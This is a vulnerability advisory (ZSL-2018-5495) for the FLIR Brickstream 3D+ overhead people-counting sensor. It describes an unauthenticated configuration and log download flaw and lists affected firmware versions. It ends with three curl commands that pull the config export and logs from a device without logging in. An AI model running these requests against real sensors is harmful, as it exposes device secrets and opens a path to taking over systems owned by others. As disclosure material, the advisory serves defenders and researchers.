The FLIR Brickstream 3D+ sensor is vulnerable to unauthenticated config download and file disclosure vulnerability when calling the ExportConfig REST API (getConfigExportFile.cgi). This will enable the attacker to disclose sensitive information and help her in authentication bypass, privilege escalation and/or full system access.
1713c8fd894c04a7b7bca5abd747a8a4
FLIR Systems FLIR Brickstream 3D+ Unauthenticated Config Download File Disclosure
Vendor: FLIR Systems, Inc.
Product web page: http://www.brickstream.com
Affected version: Firmware: 2.1.742.1842
Api: 1.0.0
Node: 0.10.33
Onvif: 0.1.1.47
Summary: The Brickstream line of sensors provides highly accurate, anonymous
information about how people move into, around, and out of physical places.
These smart devices are installed overhead inside retail stores, malls, banks,
stadiums, transportation terminals and other brick-and-mortar locations to
measure people's behaviors within the space.
Desc: The FLIR Brickstream 3D+ sensor is vulnerable to unauthenticated config
download and file disclosure vulnerability when calling the ExportConfig REST
API (getConfigExportFile.cgi). This will enable the attacker to disclose sensitive
information and help her in authentication bypass, privilege escalation and/or
full system access.
Tested on: Titan
Api/1.0.0
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2018-5495
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5495.php
26.07.2018
--
$ curl http://192.168.2.1:8083/getConfigExportFile.cgi
$ curl http://192.168.2.1:8083/restapi/system/ExportConfig
$ curl http://192.168.2.1:8083/restapi/system/ExportLogs